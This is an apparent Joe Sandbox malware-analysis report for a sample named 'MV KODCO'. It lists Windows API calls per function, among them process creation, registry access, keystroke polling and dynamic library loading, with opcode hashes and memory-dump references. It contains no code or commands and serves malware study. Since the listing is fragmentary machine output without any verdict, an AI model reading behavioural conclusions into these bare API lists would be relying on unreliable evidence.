                                                          • Opcode Fuzzy Hash: b572256348464a9531b3c8dc9027ed7273b7f98bd937e6bfbe982173c34b8850
                                                          • Instruction Fuzzy Hash: 3C217C71640206BBEF208E64DC89EFB37ABEB9A364F100618F91493290C7719C52A770
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00629588
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006295B9
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 006295CB
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00629605
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 46da8517f7d3eb2992d8a545be56f7f3b8f6dbc792ef36a29d41d16f13a478c5
                                                          • Instruction ID: 2969c4c76f4dc0fa7e8fad910e06e2b95ffade61cb81cf6be2cf06f741b6a059
                                                          • Opcode Fuzzy Hash: 46da8517f7d3eb2992d8a545be56f7f3b8f6dbc792ef36a29d41d16f13a478c5
                                                          • Instruction Fuzzy Hash: 14215170700615ABEB219F25EC05ADA77EAAF89720F204A19F9A1E73D0D770D951CF70
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00629653
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00629683
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00629694
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006296CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 586856c0ee25f2f040f3c3ec4f7781718af243d0fe555f3935074d67d9043335
                                                          • Instruction ID: 237589206638594f52feb58e6e05effabfecd17de24f68445d559460c871dfb2
                                                          • Opcode Fuzzy Hash: 586856c0ee25f2f040f3c3ec4f7781718af243d0fe555f3935074d67d9043335
                                                          • Instruction Fuzzy Hash: 8421A7716006269BEB109F69AC04ED977EEAFC5720F200618F9A1D33D0D7B09941CF70
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0062DB0A
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0062DB5E
                                                          • __swprintf.LIBCMT ref: 0062DB77
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0067DC00), ref: 0062DBB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: a3e62d1d1bf7b2d4d64a495ea6e6045c207a5e373c33c7c69b41b989ea1739e2
                                                          • Instruction ID: 5ec933c63e374311b71c4c3c592cfdeaf299762db11e82935a6b7d7dff54fcb8
                                                          • Opcode Fuzzy Hash: a3e62d1d1bf7b2d4d64a495ea6e6045c207a5e373c33c7c69b41b989ea1739e2
                                                          • Instruction Fuzzy Hash: B321A135A00149AFCB10EB65DD85DAEBBB9EF89700B004069F509EB291DB71EA01CB60
                                                          APIs
                                                            • Part of subcall function 0061C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0061C84A
                                                            • Part of subcall function 0061C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0061C85D
                                                            • Part of subcall function 0061C82D: GetCurrentThreadId.KERNEL32 ref: 0061C864
                                                            • Part of subcall function 0061C82D: AttachThreadInput.USER32(00000000), ref: 0061C86B
                                                          • GetFocus.USER32 ref: 0061CA05
                                                            • Part of subcall function 0061C876: GetParent.USER32(?), ref: 0061C884
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0061CA4E
                                                          • EnumChildWindows.USER32(?,0061CAC4), ref: 0061CA76
                                                          • __swprintf.LIBCMT ref: 0061CA90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                          • String ID: %s%d
                                                          • API String ID: 3187004680-1110647743
                                                          • Opcode ID: 1480d29debc829475728d06fb898471e227b345d7dcdd9233d4e0879e2ec806e
                                                          • Instruction ID: 4a2e8b77e5b23ea237d79ea556c9dc36e032012b71e8473ee47f35af8b770099
                                                          • Opcode Fuzzy Hash: 1480d29debc829475728d06fb898471e227b345d7dcdd9233d4e0879e2ec806e
                                                          • Instruction Fuzzy Hash: 4411A271640209BBCB41BF608CC9FED3B6EAF54754F04806AFA08AA182CB709585DB75
                                                          APIs
                                                            • Part of subcall function 00607A0D: __getptd_noexit.LIBCMT ref: 00607A0E
                                                          • __lock.LIBCMT ref: 0060748F
                                                          • InterlockedDecrement.KERNEL32(?), ref: 006074AC
                                                          • _free.LIBCMT ref: 006074BF
                                                          • InterlockedIncrement.KERNEL32(00E252E0), ref: 006074D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                          • String ID: R
                                                          • API String ID: 2704283638-2121812343
                                                          • Opcode ID: 38fcdff88d98753763c3afca60248812e007e93f210e0d9e129b81197442e059
                                                          • Instruction ID: b984b2d0698a3cf57b5a03bcdc0fbccb246cf3eea921182b717d0a9fb8f34a51
                                                          • Opcode Fuzzy Hash: 38fcdff88d98753763c3afca60248812e007e93f210e0d9e129b81197442e059
                                                          • Instruction Fuzzy Hash: 7401E131E89610EBD799AFA4950539FBBE3BB04711F154009F414A7BC0CB207910CFC6
                                                          APIs
                                                          • __lock.LIBCMT ref: 00607AD8
                                                            • Part of subcall function 00607CF4: __mtinitlocknum.LIBCMT ref: 00607D06
                                                            • Part of subcall function 00607CF4: EnterCriticalSection.KERNEL32(00000000,?,00607ADD,0000000D), ref: 00607D1F
                                                          • InterlockedIncrement.KERNEL32(?), ref: 00607AE5
                                                          • __lock.LIBCMT ref: 00607AF9
                                                          • ___addlocaleref.LIBCMT ref: 00607B17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                          • String ID: `f
                                                          • API String ID: 1687444384-3937696907
                                                          • Opcode ID: ca03ca73cb2c9c340cd5bf658e6c55acd000c8f766b076066eda6737c4b3390b
                                                          • Instruction ID: 5438c3c62e25964b70885f2335c7c4e68318b689afcf8f49f8e4fb559178dfc3
                                                          • Opcode Fuzzy Hash: ca03ca73cb2c9c340cd5bf658e6c55acd000c8f766b076066eda6737c4b3390b
                                                          • Instruction Fuzzy Hash: EA016D71984B00DFE764DF75C90574BBBF2AF50325F20890EE49A976E0CBB0A644CB45
                                                          APIs
                                                          • _memset.LIBCMT ref: 0064E33D
                                                          • _memset.LIBCMT ref: 0064E34C
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006A3D00,006A3D44), ref: 0064E37B
                                                          • CloseHandle.KERNEL32 ref: 0064E38D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseCreateHandleProcess
                                                          • String ID: D=j
                                                          • API String ID: 3277943733-1331510518
                                                          • Opcode ID: 02921d90adc4a59bae7a29cb70c155ecb39711ea20ba84f1b3e0afaff6d1123a
                                                          • Instruction ID: 0d633592221b5ae61539b6cf60d3414c7d8dfe01fb6fc58eedd7ff49870c1668
                                                          • Opcode Fuzzy Hash: 02921d90adc4a59bae7a29cb70c155ecb39711ea20ba84f1b3e0afaff6d1123a
                                                          • Instruction Fuzzy Hash: ACF030B1640324FAE3103B60AC46F777E5EDF06754F005421FE05D62A2D7756E004AB8
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006419F3
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00641A26
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00641B49
                                                          • CloseHandle.KERNEL32(?), ref: 00641BBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: aa792a73d46002877abfc711422e5f497ef6af32317a8024d3c35fd290f8eec0
                                                          • Instruction ID: c0d982ae2ae512b49030596b796f03b0d85a0df41b0cfee19fad913951fa2e7c
                                                          • Opcode Fuzzy Hash: aa792a73d46002877abfc711422e5f497ef6af32317a8024d3c35fd290f8eec0
                                                          • Instruction Fuzzy Hash: F7815170600215ABDF109F64C886BADBBE6FF49720F148459FA05AF3C2D7B9A9418B90
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00621CB4
                                                          • VariantClear.OLEAUT32(00000013), ref: 00621D26
                                                          • VariantClear.OLEAUT32(00000000), ref: 00621D81
                                                          • VariantClear.OLEAUT32(?), ref: 00621DF8
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00621E26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType
                                                          • String ID:
                                                          • API String ID: 4136290138-0
                                                          • Opcode ID: d89d405d5346f2176fbcb4ae543521d551e511337604017b6eedcf0fcba0ab87
                                                          • Instruction ID: cb1ad0a4c057f13c0537a45dbc8aea5ec15ed6d83daab262423389e04a023785
                                                          • Opcode Fuzzy Hash: d89d405d5346f2176fbcb4ae543521d551e511337604017b6eedcf0fcba0ab87
                                                          • Instruction Fuzzy Hash: 8F5155B5A00219EFCB14CF58D880AAAB7B9FF8D314B158559ED59DB300E730EA11CFA0
                                                          APIs
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 006406EE
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0064077D
                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0064079B
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 006407E1
                                                          • FreeLibrary.KERNEL32(00000000,00000004), ref: 006407FB
                                                            • Part of subcall function 005FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0062A574,?,?,00000000,00000008), ref: 005FE675
                                                            • Part of subcall function 005FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0062A574,?,?,00000000,00000008), ref: 005FE699
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 327935632-0
                                                          • Opcode ID: 0f6397d0d44110fea4586521e6160b4404c81747c7020221f99912f5e4ca4e90
                                                          • Instruction ID: bf6d38eb019db180b6b887af3873b9cfdfb55e7525c469884ae145be2bce8d54
                                                          • Opcode Fuzzy Hash: 0f6397d0d44110fea4586521e6160b4404c81747c7020221f99912f5e4ca4e90
                                                          • Instruction Fuzzy Hash: 22519D75A0025ADFDB04EFA8C485DADBBB6BF89310B048055EA55AB352DB70ED02CF90
                                                          APIs
                                                            • Part of subcall function 00643C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00642BB5,?,?), ref: 00643C1D
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00642EEF
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00642F2E
                                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00642F75
                                                          • RegCloseKey.ADVAPI32(?,?), ref: 00642FA1
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00642FAE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                          • String ID:
                                                          • API String ID: 3740051246-0
                                                          • Opcode ID: 5bb9872083b418b2b9d7205fc2735d86cd18cc3cd451dcaa71307b9b6c8c5a0c
                                                          • Instruction ID: 5197781cf0a54059ffa485c1eae29f7677c63832b2fba84a307ccbd9432c43df
                                                          • Opcode Fuzzy Hash: 5bb9872083b418b2b9d7205fc2735d86cd18cc3cd451dcaa71307b9b6c8c5a0c
                                                          • Instruction Fuzzy Hash: 1D519A71208245AFC704EF64C895EAABBFAFF88304F90881DF59587291DB70E909CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a4e6ef58205aacc44df046a91c911738da946573b3967c380e8742f26173079
                                                          • Instruction ID: 8d7331922b187d8c900c581be9cdeea25c103c27f0323ded2d12bb8b8fbac825
                                                          • Opcode Fuzzy Hash: 7a4e6ef58205aacc44df046a91c911738da946573b3967c380e8742f26173079
                                                          • Instruction Fuzzy Hash: 5341A379E02114AFC7A0DF68CC44FE9BF6AEF4A360F141165E959A73E1C770AD01DA50
                                                          APIs
                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 006312B4
                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 006312DD
                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0063131C
                                                            • Part of subcall function 005E936C: __swprintf.LIBCMT ref: 005E93AB
                                                            • Part of subcall function 005E936C: __itow.LIBCMT ref: 005E93DF
                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00631341
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00631349
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1389676194-0
                                                          • Opcode ID: d246108425a8117ff99a1e874eb669851c0ab365ddbc1655e8552153f93f43dd
                                                          • Instruction ID: b20ec7c9b37e7aff1aab347d6f3a9311ccabca5bcf3176c23979728f352e922e
                                                          • Opcode Fuzzy Hash: d246108425a8117ff99a1e874eb669851c0ab365ddbc1655e8552153f93f43dd
                                                          • Instruction Fuzzy Hash: 6E412A35A00145EFDB05EF65C9959AEBBF5FF49310B148099E94AAB3A2CB31ED01CF90
                                                          APIs
                                                          • GetCursorPos.USER32(000000FF), ref: 005FB64F
                                                          • ScreenToClient.USER32(00000000,000000FF), ref: 005FB66C
                                                          • GetAsyncKeyState.USER32(00000001), ref: 005FB691
                                                          • GetAsyncKeyState.USER32(00000002), ref: 005FB69F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AsyncState$ClientCursorScreen
                                                          • String ID:
                                                          • API String ID: 4210589936-0
                                                          • Opcode ID: 9b77d6523b3c39302d1aeb92e5762c441668c8d5ee7e97046082e197799ac5aa
                                                          • Instruction ID: ddb9a51ae465a1973de8c1ee35c035d244ea9b6c4813481ced42c34369a6100b
                                                          • Opcode Fuzzy Hash: 9b77d6523b3c39302d1aeb92e5762c441668c8d5ee7e97046082e197799ac5aa
                                                          • Instruction Fuzzy Hash: A4416E31A04219FFDF199F64C844AE9BBB5FB05325F104319F829962D0CB34A994DFA1
                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 0061B369
                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 0061B413
                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0061B41B
                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 0061B429
                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0061B431
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessagePostSleep$RectWindow
                                                          • String ID:
                                                          • API String ID: 3382505437-0
                                                          • Opcode ID: f71bc8f3fb0a3af53da21ed5f8eab230ea634ce90cfce6119f162c8fee24064a
                                                          • Instruction ID: 3b3efe20e8cbb69ecef2da318444aeef6f2b9d9c8b8febc2c86afd02f14d912e
                                                          • Opcode Fuzzy Hash: f71bc8f3fb0a3af53da21ed5f8eab230ea634ce90cfce6119f162c8fee24064a
                                                          • Instruction Fuzzy Hash: C431CE71900219EBDF04CF68D94DADE7BB6EB04315F149229F821EA2D1C3B0ADA4CB91
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0061DBD7
                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0061DBF4
                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0061DC2C
                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0061DC52
                                                          • _wcsstr.LIBCMT ref: 0061DC5C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                          • String ID:
